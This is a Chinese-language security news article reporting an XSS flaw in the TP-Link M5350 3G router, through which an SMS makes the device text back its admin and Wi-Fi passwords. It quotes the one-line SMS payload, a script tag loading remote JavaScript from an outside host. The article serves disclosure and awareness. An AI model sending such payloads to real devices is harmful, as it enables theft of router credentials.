神漏洞!發條簡訊,路由器竟主動吐露Wi-Fi密碼
02-10
TP-Link的設備漏洞庫又增新丁。
這次的主角是TP-Link M5350,一款攜帶型3G路由器。
據Bleeping Computer報道,德國安全研究員Jan H?rsch發現,該款路由器存在一枚神奇漏洞,向路由器發送簡訊,它便會將管理員密碼、Wi-Fi密碼以簡訊形式回復。
這是條什麼簡訊呢?
<script src=//n.ms/a.js></script>(不用試,研究員早把腳本下線了)
漏洞效果圖
懂行的讀者應該已經知道是怎麼回事了。沒錯,這就是XSS(跨站腳本攻擊)漏洞。
作為3G路由器,TP-Link M5350支持簡訊收發功能,但在簡訊功能位置未做好過濾,以至於產生漏洞。
類似漏洞在互聯網產品上比較常見,但能造成此等效果也很罕見,目測是TP-Link內部安全流程沒能留意到。
聽著厲害,不過想利用漏洞得先搞清楚使用者的3G上網卡號碼,難度也不小。
比較奇葩的是,TP-Link目前應該還沒修復漏洞。SecurityAffairs專門找了M5350的官方產品頁(澳洲版),發現這款路由最新的固件發布日期是2015年1月,顯然不是修復版。嘶吼也檢索了一番,了解到M5350主要在海外賣,京東淘寶都沒有,國內想研究的童鞋顯然沒啥機會了。
如若轉載,請註明原文地址: 神漏洞!發條簡訊,路由器竟主動吐露Wi-Fi密碼 更多內容請關注「嘶吼專業版」——Pro4hou
推薦閱讀:
※XSS introduction
※記一次沒什麼技術含量的XSS注入
※白帽子挖洞—跨站腳本攻擊(XSS)篇
※XSS常見攻擊與防禦
※XSS技術入門專題—第三期技術專題